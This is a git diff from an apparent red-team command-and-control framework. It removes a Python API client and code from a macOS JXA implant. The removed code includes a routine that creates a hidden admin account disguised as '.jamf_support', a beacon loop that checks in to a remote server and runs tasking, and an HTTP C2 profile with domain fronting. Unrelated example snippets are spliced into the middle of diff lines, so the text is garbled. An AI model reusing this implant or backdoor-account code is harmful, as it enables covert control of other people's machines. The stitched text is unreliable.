self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.post_json(url, data=await obj_to_json(credential)) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = Credential(**resp.response) - return resp - - async def update_credential(self, credential: Credential) -> MythicResponse: - """ - Create a new credential associated with the user's current operation - :return: - """ - url = "{}{}:{}/api/v{}/credentials/{}".format( - self._http, - 
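# A brief sketch of the task comment endpoint above, assuming `mythic` is an authenticated
# instance of this client and `task` is a Task whose id is populated.
async def example_comment_task(mythic, task):
    task.comment = "reviewed - follow up on this output"
    await mythic.set_comment_on_task(task)
    # Clearing the comment (empty string or None) issues a DELETE against the same endpoint.
    task.comment = ""
    await mythic.set_comment_on_task(task)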
self.server_ip, - self._server_port, - self._server_api_version, - str(credential.id), - ) - resp = await self.put_json(url, data=await obj_to_json(credential)) - if resp.response_code == 200: - # update the response with APIToken objects instead of just a dictionary - resp.response = Credential(**resp.response) - return resp - - # =============== DISABLED COMMANDS PROFILES ENDPOINTS ======= - - async def get_all_disabled_commands_profiles(self) -> MythicResponse: - """ - Get all of the disabled command profiles associated with Mythic - :return: - """ - url = "{}{}:{}/api/v{}/operations/disabled_commands_profiles".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - profile_entries = [] - for name, ptypes in resp.response["disabled_command_profiles"].items(): - new_entry = DisabledCommandsProfile(name=name, payload_types=[]) - for ptype, commands in ptypes.items(): - payload_type = PayloadType(ptype=ptype, commands=[]) - for command in commands: - payload_type.commands.append( - Command(cmd=command["command"], id=command["command_id"]) - ) - new_entry.payload_types.append(payload_type) - profile_entries.append(new_entry) - resp.response = profile_entries - return resp - - async def create_disabled_commands_profile( - self, profile: DisabledCommandsProfile - ) -> MythicResponse: - """ - Create a new disabled command profiles associated with Mythic - :return: - """ - url = "{}{}:{}/api/v{}/operations/disabled_commands_profile".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - data = {profile.name: {}} - for payload_type in profile.payload_types: - data[profile.name][payload_type.ptype] = [] - for command in payload_type.commands: - data[profile.name][payload_type.ptype].append(command.cmd) - resp = await self.post_json(url, data=data) - if resp.response_code == 200 and resp.status == "success": - profile_entries = [] - for entry in resp.response["disabled_command_profile"]: - # first check if we have a profile for this - found = False - for p in profile_entries: - if p.name == entry["name"]: - found = True - ptype_found = False - for payload_type in p.payload_types: - if payload_type.ptype == entry["payload_type"]: - ptype_found = True - payload_type.commands.append( - Command( - cmd=entry["command"], id=entry["command_id"] - ) - ) - if not ptype_found: - p.payload_types.append( - PayloadType( - ptype=entry["payload_type"], - commands=[ - Command( - cmd=entry["command"], id=entry["command_id"] - ) - ], - ) - ) - if not found: - dcp = DisabledCommandsProfile(name=entry["name"], payload_types=[]) - dcp.payload_types.append( - PayloadType( - ptype=entry["payload_type"], - commands=[ - Command(cmd=entry["command"], id=entry["command_id"]) - ], - ) - ) - profile_entries.append(dcp) - resp.response = profile_entries - return resp - - async def update_disabled_commands_profile( - self, profile: DisabledCommandsProfile - ) -> MythicResponse: - """ - Create a new disabled command profiles associated with Mythic - :return: - """ - url = "{}{}:{}/api/v{}/operations/disabled_commands_profile".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - data = {profile.name: {}} - for payload_type in profile.payload_types: - data[profile.name][payload_type.ptype] = [] - for command in payload_type.commands: - data[profile.name][payload_type.ptype].append(command.cmd) - resp = await self.put_json(url, data=data) - if resp.response_code == 200 
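# A sketch of the disabled-commands-profile endpoints above, assuming `mythic` is an
# authenticated instance of this client. The profile, payload type, and command names are
# only examples; Command is built here with just a cmd because that is all
# create_disabled_commands_profile reads from it.
async def example_create_disabled_profile(mythic):
    profile = DisabledCommandsProfile(name="baseline restrictions", payload_types=[])
    profile.payload_types.append(
        PayloadType(ptype="apfell", commands=[Command(cmd="add_user"), Command(cmd="shell")])
    )
    resp = await mythic.create_disabled_commands_profile(profile)
    # On success, resp.response is rebuilt into a list of DisabledCommandsProfile objects.
    return resp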
and resp.status == "success": - profile_entries = [] - for entry in resp.response["disabled_command_profile"]: - # first check if we have a profile for this - found = False - for p in profile_entries: - if p.name == entry["name"]: - found = True - ptype_found = False - for payload_type in p.payload_types: - if payload_type.ptype == entry["payload_type"]: - ptype_found = True - payload_type.commands.append( - Command( - cmd=entry["command"], id=entry["command_id"] - ) - ) - if not ptype_found: - p.payload_types.append( - PayloadType( - ptype=entry["payload_type"], - commands=[ - Command( - cmd=entry["command"], id=entry["command_id"] - ) - ], - ) - ) - if not found: - dcp = DisabledCommandsProfile(name=entry["name"], payload_types=[]) - dcp.payload_types.append( - PayloadType( - ptype=entry["payload_type"], - commands=[ - Command(cmd=entry["command"], id=entry["command_id"]) - ], - ) - ) - profile_entries.append(dcp) - resp.response = profile_entries - return resp - - async def update_disabled_commands_profile_for_operator( - self, - profile: Union[DisabledCommandsProfile, str], - operator: Operator, - operation: Operation, - ) -> MythicResponse: - # async def add_or_update_operator_for_operation(self, operation: Operation, operator: Operator) - if isinstance(profile, DisabledCommandsProfile): - operator.base_disabled_commands = profile.name - else: - operator.base_disabled_commands = profile - resp = await self.add_or_update_operator_for_operation(operation, operator) - return resp - - # =============== EVENT LOG MESSAGES ======================== - - async def get_all_event_messages(self) -> MythicResponse: - """ - Get all of the event messages associated with Mythic for the current operation that are not deleted - :return: - """ - url = "{}{}:{}/api/v{}/event_message".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - resp.response = [EventMessage(**x) for x in resp.response["alerts"]] - return resp - - async def create_event_message(self, message: EventMessage) -> MythicResponse: - """ - Create new event message for the current operation - :return: - """ - url = "{}{}:{}/api/v{}/event_message".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.post_json(url, data=await obj_to_json(message)) - if resp.response_code == 200 and resp.status == "success": - resp.response = EventMessage(resp.response) - return resp - - async def update_event_message(self, message: EventMessage) -> MythicResponse: - """ - Update event message for the current operation - :return: - """ - url = "{}{}:{}/api/v{}/event_message/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(message.id), - ) - resp = await self.put_json(url, data=await obj_to_json(message)) - if resp.response_code == 200 and resp.status == "success": - resp.response = EventMessage(resp.response) - return resp - - async def remove_event_message(self, message: EventMessage) -> MythicResponse: - """ - Update event message for the current operation - :return: - """ - url = "{}{}:{}/api/v{}/event_message/delete".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.post_json(url, data={"messages": [message.id]}) - if resp.response_code == 200 and resp.status == "success": - resp.response = EventMessage(resp.response) - return resp - - async def 
remove_event_messages(self, messages: List) -> MythicResponse: - """ - Update event message for the current operation - :return: - """ - url = "{}{}:{}/api/v{}/event_message/delete".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - msgs = [m.id for m in messages] - resp = await self.post_json(url, data={"messages": msgs}) - if resp.response_code == 200 and resp.status == "success": - resp.response = EventMessage(resp.response) - return resp - - # ============= CUSTOM HELPER FUNCTIONS ====================== - - async def login(self): - """ - Login with username/password and store resulting access_token and refresh_token - """ - url = "{}{}:{}/auth".format(self._http, self._server_ip, self._server_port) - data = {"username": self.username, "password": self.password} - resp = await self.post_json(url, data) - if resp.response_code == 200: - self._access_token = resp.response["access_token"] - self._refresh_token = resp.response["refresh_token"] - return resp - else: - raise Exception("Failed to log in: " + json.dumps(resp, indent=2, default=lambda o: o.to_json())) - sys.exit(1) - - async def set_or_create_apitoken(self, token_type="User"): - """ - Use current auth to check if there are any user tokens. Either get one or create a new user one - """ - resp = await self.get_apitokens() - if resp.status == "success": - for x in resp.response: - if x.token_type == token_type: - self._apitoken = x - resp.response = x - return resp - # if we get here, then we don't have a token of the right type for us to just leverage, so we need to get one - token_resp = await self.create_apitoken(token_type=token_type) - if token_resp.response_code == 200: - self._apitoken = token_resp.response - return token_resp - - async def wait_for_task_status_change(self, task_id, status, timeout=None): - """ - Uses websockets to listen for notifications related to the specified task within a certain period of time - if self.timeout is -1, then wait indefinitely - :param task_id: - :param status: the status we're waiting for (error is always included) - :return: - """ - if timeout is None: - timeout = self.global_timeout - url = "{}{}:{}/ws/task/{}".format( - self._ws, self._server_ip, self._server_port, str(task_id) - ) - headers = self.get_headers() - try: - async with aiohttp.ClientSession() as session: - ws = await session.ws_connect(url, headers=headers, ssl=False) - start = time() - while True: - try: - if timeout > 0 and (time() - start >= timeout): - raise Exception("wait_for_task_status_change has timed out") - msg = await ws.receive() - if msg.data is None: - return None - if msg.data != "": - task = Task(**json.loads(msg.data)) - if ( - task.status == "error" - or task.completed == True - or task.status.lower() == status.lower() - ): - return task - except Exception as e: - raise Exception("Exception while waiting for task status change: " + str(e)) - except Exception as e: - raise Exception("Exception in outer try/catch while waiting for task status change: " + str(e)) - - async def wait_for_payload_status_change(self, payload_uuid, status, timeout=None): - """ - Uses websockets to listen for notifications related to the specified pyaload within a certain period of time - if self.timeout is -1, then wait indefinitely - :param payload_uuid: - :param status: the status we're waiting for (error is always included) - :return: - """ - if timeout is None: - timeout = self.global_timeout - url = "{}{}:{}/ws/payloads/{}".format( - self._ws, self._server_ip, self._server_port, 
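# A connection sketch tying the helpers above together. The client class name (`Mythic`) and
# its constructor keywords are assumptions for illustration only; this diff shows just that the
# instance carries username/password and server address attributes.
async def example_connect(username, password, server_ip, server_port):
    mythic = Mythic(username=username, password=password,
                    server_ip=server_ip, server_port=server_port)
    await mythic.login()                   # stores access_token / refresh_token on success
    await mythic.set_or_create_apitoken()  # reuse an existing User API token or create one
    return mythic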
str(payload_uuid) - ) - headers = self.get_headers() - try: - async with aiohttp.ClientSession() as session: - ws = await session.ws_connect(url, headers=headers, ssl=False) - start = time() - while True: - try: - if timeout > 0 and (time() - start >= timeout): - raise Exception( - "wait_for_payload_status_change has timed out" - ) - msg = await ws.receive() - if msg.data is None: - return None - if msg.data != "": - payload = Payload(**json.loads(msg.data)) - if ( - payload.build_phase == "error" - or payload.deleted == True - or payload.build_phase == status - ): - return payload - except Exception as e: - raise Exception("Exception while waiting for payload status change: " + str(e)) - except Exception as e: - raise Exception("Exception in outer try/catch while waiting for payload status change: " + str(e)) - - # ============= WEBSOCKET NOTIFICATION FUNCTIONS =============== - - async def listen_for_all_notifications_on_one_callback( - self, callback_id, callback_function=None, timeout=None - ): - """ - Uses websockets to listen for all notifications related to a specific callback and prints to the screen. - To stop listening, call cancel() on the result from this function call - :param callback_id: - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/unified_callback/{}".format( - self._ws, self._server_ip, self._server_port, str(callback_id) - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_new_callbacks(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all notifications related new callbacks. - To stop listening, call cancel() on the result from this function call - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/new_callbacks/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_responses_for_task( - self, task_id, callback_function=None, timeout=None - ): - """ - Uses websockets to listen for all responses on a given task - To stop listening, call cancel() on the result from this function call - :param callback_id: - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/responses/by_task/{}".format( - self._ws, self._server_ip, self._server_port, str(task_id) - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def gather_task_responses(self, task_id, timeout=None) -> List: - """ - Uses websockets to listen for all responses related to task_id and gather them together into an array until the task is completed or errored. 
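Example (illustrative; assumes `mythic` is an authenticated instance of this client
and `task` is a Task whose id is populated):
    responses = await mythic.gather_task_responses(task.id, timeout=60)
    # responses is a list of Response objects collected until the task completes or errors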
- :param callback_id: - :param callback_function: gets called on each notification - :return: - """ - if timeout is None: - timeout = self.global_timeout - url = "{}{}:{}/ws/responses/by_task/{}".format( - self._ws, self._server_ip, self._server_port, str(task_id) - ) - headers = self.get_headers() - responses = [] - try: - async with aiohttp.ClientSession() as session: - ws = await session.ws_connect(url, headers=headers, ssl=False) - start = time() - while True: - try: - if timeout > 0 and (time() - start >= timeout): - raise Exception("gather_task_responses has timed out") - msg = await ws.receive() - if msg.data is None: - return responses - if msg.data != "": - rsp = Response(**json.loads(msg.data)) - # await json_print(rsp) - responses.append(rsp) - if rsp.task.status == "error" or rsp.task.completed == True: - return responses - except Exception as e: - raise Exception("Exception while gathering responses: " + str(e)) - except Exception as e: - raise Exception("Exception in our try/catch while gathering responses: " + str(e)) - - async def listen_for_all_files(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all file notifications within mythic for the current operation. - This includes payloads, uploads, downloads, screenshots. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/files/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_new_files(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all file notifications within mythic for the current operation. - This includes uploads, downloads. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/files/new/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_all_responses(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all response notifications within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/responses/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_new_responses(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all new response notifications within mythic for the current operation. 
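Example (illustrative; assumes `mythic` is an authenticated instance of this client and
that a plain function is an acceptable handler for stream_output, which is defined elsewhere):
    def handler(message):
        print(message)
    listener = await mythic.listen_for_new_responses(handler)
    # ... later, stop streaming:
    listener.cancel()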
- :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/responses/new/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_all_tasks(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all tasks within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/tasks/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_new_tasks(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all new tasks within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/tasks/new/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_all_payloads(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for all payloads within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/payloads/info/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_all_credentials(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for credentials within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/credentials/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_new_credentials(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for new credentials within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/credentials/new/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_all_event_messages(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for event messages within mythic for the current operation. 
- :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/events_all/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task - - async def listen_for_new_event_messages(self, callback_function=None, timeout=None): - """ - Uses websockets to listen for new event messages within mythic for the current operation. - :param callback_function: gets called on each notification - :return: - """ - url = "{}{}:{}/ws/events_notifier/current_operation".format( - self._ws, self._server_ip, self._server_port - ) - if callback_function: - task = await self.stream_output(url, callback_function, timeout) - else: - task = await self.stream_output(url, self.print_websocket_output, timeout) - return task diff --git a/Mythic_CLI/requirements.txt b/Mythic_CLI/requirements.txt deleted file mode 100644 index 97c7886f9..000000000 --- a/Mythic_CLI/requirements.txt +++ /dev/null @@ -1,2 +0,0 @@ -aiohttp -asyncio diff --git a/Payload_Types/poseidon/agent_code/download/.gitkeep b/Payload_Types/.gitkeep old mode 100755 new mode 100644 similarity index 100% rename from Payload_Types/poseidon/agent_code/download/.gitkeep rename to Payload_Types/.gitkeep diff --git a/Payload_Types/apfell/Dockerfile b/Payload_Types/apfell/Dockerfile deleted file mode 100755 index ea00f25c0..000000000 --- a/Payload_Types/apfell/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -From itsafeaturemythic/python38_payload:0.0.1 \ No newline at end of file diff --git a/Payload_Types/apfell/agent_code/add_user.js b/Payload_Types/apfell/agent_code/add_user.js deleted file mode 100755 index 93822561c..000000000 --- a/Payload_Types/apfell/agent_code/add_user.js +++ /dev/null @@ -1,74 +0,0 @@ -exports.add_user = function(task, command, params){ - try{ - // Add a user with dscl to the local machine - let config = JSON.parse(params); - let admin = true; - let hidden = true; - let username = ".jamf_support"; - let password = "P@55w0rd_Here"; - let realname = "Jamf Support User"; - let homedir = "/Users/"; - let uniqueid = 403; - let primarygroupid = 80; //this is the admin group - let usershell = "/bin/bash"; - let createprofile = false; - let user = ""; //username of the user with sudo capability to do these commands - let passwd = ""; //password of the user with sudo capability to do these commands - if(config.hasOwnProperty("admin") && typeof config['admin'] == 'boolean'){ admin = config['admin']; } - if(config.hasOwnProperty("hidden") && typeof config['hidden'] == 'boolean'){ hidden = config['hidden']; } - if(config.hasOwnProperty("username") && config['username'] != ''){ username = config['username']; } - if(config.hasOwnProperty("password") && config['password'] != ''){ password = config['password']; } - if(config.hasOwnProperty("realname") && config['realname'] != ''){ realname = config['realname']; } - if(config.hasOwnProperty("uniqueid") && config['uniqueid'] != -1){ uniqueid = config['uniqueid']; } - else if(config.hasOwnProperty('uniqueid') && typeof config['uniqueid'] == 'string' && config['uniqueid'] != ''){ uniqueid = parseInt(config['uniqueid']); } - if(config.hasOwnProperty("primarygroupid") && config['primarygroupid'] != -1){ primarygroupid = config['primarygroupid']; } - else if(config.hasOwnProperty('primarygroupid') && typeof config['primarygroupid'] == 'string' && config['primarygroupid'] != ''){ 
primarygroupid = parseInt(config['primarygroupid']); } - if(config.hasOwnProperty("usershell") && config['usershell'] != ''){ usershell = config['usershell']; } - if(config.hasOwnProperty("createprofile") && typeof config['createprofile'] == "boolean"){ createprofile = config['createprofile']; } - if(config.hasOwnProperty("homedir") && config['homedir'] != ''){ homedir = config['homedir']; } - else{ homedir += username; } - if(config.hasOwnProperty("user") && config['user'] != ''){ user = config['user']; } - else{ return "User's name is required to do sudo commands"; } - if(config.hasOwnProperty("passwd") && config['passwd'] != ''){ passwd = config['passwd']; } - else{ return "User's password is required to do sudo commands"; } - // now do our series of dscl commands to set up the account - try{ - let cmd = "dscl . create /Users/" + username; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - if(hidden){ - cmd = "dscl . create /Users/" + username + " IsHidden 1"; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - } - cmd = "dscl . create /Users/" + username + " UniqueID " + uniqueid; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - cmd = "dscl . create /Users/" + username + " PrimaryGroupID " + primarygroupid; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - cmd = "dscl . create /Users/" + username + " NFSHomeDirectory \"" + homedir + "\""; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - cmd = "dscl . create /Users/" + username + " RealName \"" + realname + "\""; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - cmd = "dscl . create /Users/" + username + " UserShell " + usershell; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - if(admin){ - cmd = "dseditgroup -o edit -a " + username + " -t user admin"; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - } - cmd = "dscl . 
passwd /Users/" + username + " \"" + password + "\""; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - if(createprofile){ - cmd = "mkdir \"" + homedir + "\""; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - cmd = "cp -R \"/System/Library/User Template/English.lproj/\" \"" + homedir + "\""; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - cmd = "chown -R " + username + ":staff \"" + homedir + "\""; - currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:user, password:passwd}); - } - return {"user_output": "Successfully ran the commands to create the user", "completed": true}; - }catch(error){ - return{"user_output": error.toString(), "status": "error", "completed": true}; - } - }catch(error){ - return {"user_output": error.toString(), "status": "error", "completed": true}; - } - -}; diff --git a/Payload_Types/apfell/agent_code/base/apfell-jxa.js b/Payload_Types/apfell/agent_code/base/apfell-jxa.js deleted file mode 100755 index 6fa9f98c6..000000000 --- a/Payload_Types/apfell/agent_code/base/apfell-jxa.js +++ /dev/null @@ -1,194 +0,0 @@ -// Created by Cody Thomas - @its_a_feature_ -ObjC.import('Cocoa'); -ObjC.import('Foundation'); //there by default I think, but safe to include anyway -ObjC.import('stdlib'); -ObjC.bindFunction('CFMakeCollectable', ['id', ['void *'] ]); -var currentApp = Application.currentApplication(); -currentApp.includeStandardAdditions = true; -//--------------IMPLANT INFORMATION----------------------------------- -class agent{ - constructor(){ - this.procInfo = $.NSProcessInfo.processInfo; - this.hostInfo = $.NSHost.currentHost; - this.id = ""; - this.user = ObjC.deepUnwrap(this.procInfo.userName); - this.fullName = ObjC.deepUnwrap(this.procInfo.fullUserName); - //every element in the array needs to be unwrapped - this.ip = ObjC.deepUnwrap(this.hostInfo.addresses); //probably just need [0] - this.pid = this.procInfo.processIdentifier; - //every element in the array needs to be unwrapped - this.host = ObjC.deepUnwrap(this.hostInfo.names); //probably just need [0] - //this is a dictionary, but every 'value' needs to be unwrapped - this.environment = ObjC.deepUnwrap(this.procInfo.environment); - this.uptime = this.procInfo.systemUptime; - //every element in the array needs to be unwrapped - this.args = ObjC.deepUnwrap(this.procInfo.arguments); - this.osVersion = this.procInfo.operatingSystemVersionString.js; - this.uuid = "UUID_HERE"; - } -} -var apfell = new agent(); -//--------------Base C2 INFORMATION---------------------------------------- -class baseC2{ - //To create your own C2, extend this class and implement the required functions - //The main code depends on the mechanism being C2 with these functions. 
- // the implementation of the functions doesn't matter though - // You're welcome to add additional functions as well, but this is the minimum - constructor(interval, baseurl){ - this.interval = interval; //seconds between callbacks - this.baseurl = baseurl; //where to reach out to - this.commands = []; - } - checkin(){ - //check in with c2 server - } - getTasking(){ - //reach out to wherever to get tasking - } - getConfig(){ - //gets the current configuration for tasking - } - postResponse(task, output){ - //output a response to a task - } - setConfig(params){ - //updates the current configuration for how to get tasking - } - download(task, params){ - //gets a file from the apfell server in some way - } - upload(task, params){ - //uploads a file in some way to the teamserver - } -} -C2PROFILE_HERE -//-------------SHARED COMMAND CODE ------------------------ -does_file_exist = function(strPath){ - var error = $(); - return $.NSFileManager.defaultManager.attributesOfItemAtPathError($(strPath).stringByStandardizingPath, error), error.code === undefined; -}; -convert_to_nsdata = function(strData){ - // helper function to convert UTF8 strings to NSData objects - var tmpString = $.NSString.alloc.initWithCStringEncoding(strData, $.NSData.NSUnicodeStringEncoding); - return tmpString.dataUsingEncoding($.NSData.NSUTF16StringEncoding); -}; -write_data_to_file = function(data, file_path){ - try{ - //var open_file = currentApp.openForAccess(Path(file_path), {writePermission: true}); - //currentApp.setEof(open_file, { to: 0 }); //clear the current file - //currentApp.write(data, { to: open_file, startingAt: currentApp.getEof(open_file) }); - //currentApp.closeAccess(open_file); - if(typeof data == "string"){ - data = convert_to_nsdata(data); - } - if (data.writeToFileAtomically($(file_path), true)){ - return "file written"; - } - else{ - return "failed to write file"; - } - } - catch(error){ - return "failed to write to file: " + error.toString(); - } -}; -default_load = function(contents){ - var module = {exports: {}}; - var exports = module.exports; - if(typeof contents == "string"){ - eval(contents); - } - else{ - eval(contents.js); - } - return module.exports; -}; -base64_decode = function(data){ - if(typeof data == "string"){ - var ns_data = $.NSData.alloc.initWithBase64Encoding($(data)); - } - else{ - var ns_data = data; - } - var decoded_data = $.NSString.alloc.initWithDataEncoding(ns_data, $.NSUTF8StringEncoding).js; - return decoded_data; -}; -base64_encode = function(data){ - if(typeof data == "string"){ - var ns_data = convert_to_nsdata(data); - } - else{ - var ns_data = data; - } - var encoded = ns_data.base64EncodedStringWithOptions(0).js; - return encoded; -}; -var exports = {}; // get stuff ready for initial command listing -COMMANDS_HERE -//console.log("about to load commands"); -var commands_dict = exports; -var jsimports = ""; - -//-------------GET IP AND CHECKIN ---------------------------------- -if( $.NSDate.date.compare(C2.kill_date) === $.NSOrderedDescending ){ - $.NSApplication.sharedApplication.terminate(this); -} -let ip_found = false; -C2.commands = Object.keys(commands_dict); -let domain = ""; -if(does_file_exist("/etc/krb5.conf")){ - let contents = $.NSString.stringWithContentsOfFileEncodingError("/etc/krb5.conf", $.NSUTF8StringEncoding, $.nil).js; - contents = contents.split("\n"); - for(let j = 0; j < contents.length; j++){ - if(contents[j].includes("default_realm")){ - domain = contents[j].split("=")[1].trim(); - } - } -} -for(let i=0; i < apfell.ip.length; i++){ - let 
ip = apfell.ip[i]; - if (ip.includes(".") && ip !== "127.0.0.1"){ // the includes(".") is to make sure we're looking at IPv4 - C2.checkin(ip,apfell.pid,apfell.user,ObjC.unwrap(apfell.procInfo.hostName),apfell.osVersion, "x64", domain); - ip_found = true; - break; - } -} -if(!ip_found){ - C2.checkin("127.0.0.1",apfell.pid,apfell.user,ObjC.unwrap(apfell.procInfo.hostName),apfell.osVersion, "x64", domain); -} -//---------------------------MAIN LOOP ---------------------------------------- -function sleepWakeUp(){ - while(true){ - $.NSThread.sleepForTimeInterval(C2.gen_sleep_time()); - let output = ""; - let task = C2.getTasking(); - //console.log(JSON.stringify(task)); - let command = ""; - try{ - //console.log(JSON.stringify(task)); - if(task.length === 0){ - continue; - } - task = task[0]; - //console.log(JSON.stringify(task)); - command = task["command"]; - try{ - output = commands_dict[command](task, command, task['parameters']); - } - catch(error){ - if(error.toString().includes("commands_dict[command] is not a function")){ - output ={"user_output": "Unknown command: " + command, "status": "error", "completed": true}; - } - else{ - output = {"user_output": error.toString(), "status": "error", "completed": true}; - } - } - C2.postResponse(task, output); - } - catch(error){ - C2.postResponse(task, {"user_output": error.toString(), "status": "error", "completed": true}); - } - //task["command"] = "none"; //reset just in case something goes weird - } -} -sleepWakeUp(); diff --git a/Payload_Types/apfell/agent_code/c2_profiles/HTTP.js b/Payload_Types/apfell/agent_code/c2_profiles/HTTP.js deleted file mode 100644 index 77456745c..000000000 --- a/Payload_Types/apfell/agent_code/c2_profiles/HTTP.js +++ /dev/null @@ -1,494 +0,0 @@ -//-------------RESTFUL C2 mechanisms --------------------------------- -class customC2 extends baseC2{ - constructor(interval, cback_host, cback_port){ - if(cback_port === "443" && cback_host.includes("https://")){ - super(interval, cback_host); - }else if(cback_port === "80" && cback_host.includes("http://")){ - super(interval, cback_host); - }else{ - let last_slash = cback_host.indexOf("/", 8); - if(last_slash === -1){ - //there is no 3rd slash - super(interval, cback_host + ":" + cback_port); - }else{ - //there is a 3rd slash, so we need to splice in the port - super(interval,cback_host.substring(0, last_slash) + ":" + cback_port + "/" + cback_host.substring(last_slash)) - } - } - this.commands = []; - this.url = this.baseurl; - this.getURI = "get_uri"; - this.postURI = "post_uri"; - this.queryPathName = "query_path_name"; - this.proxyURL = "proxy_host"; - this.proxyPort = "proxy_port"; - this.proxyUser = "proxy_user"; - this.proxyPassword = "proxy_pass"; - this.proxy_dict = {}; - if(this.proxyURL !== ""){ - if(this.proxyURL.includes("https")) { - this.proxy_dict["HTTPSEnable"] = 1; - this.proxy_dict["HTTPSProxy"] = this.proxyURL; - this.proxy_dict["HTTPSPort"] = parseInt(this.proxyPort); - }else{ - this.proxy_dict["HTTPEnable"] = 1; - this.proxy_dict["HTTPProxy"] = this.proxyURL; - this.proxy_dict["HTTPPort"] = parseInt(this.proxyPort); - } - } - if(this.proxyUser !== ""){ - this.proxy_dict["kCFProxyUsernameKey"] = this.proxyUser; - } - if(this.proxyPassword !== ""){ - this.proxy_dict["kCFProxyPasswordKey"] = this.proxyPassword; - } - this.jitter = callback_jitter; - this.host_header = "domain_front"; - this.user_agent = "USER_AGENT"; - this.aes_psk = "AESPSK"; // base64 encoded key - 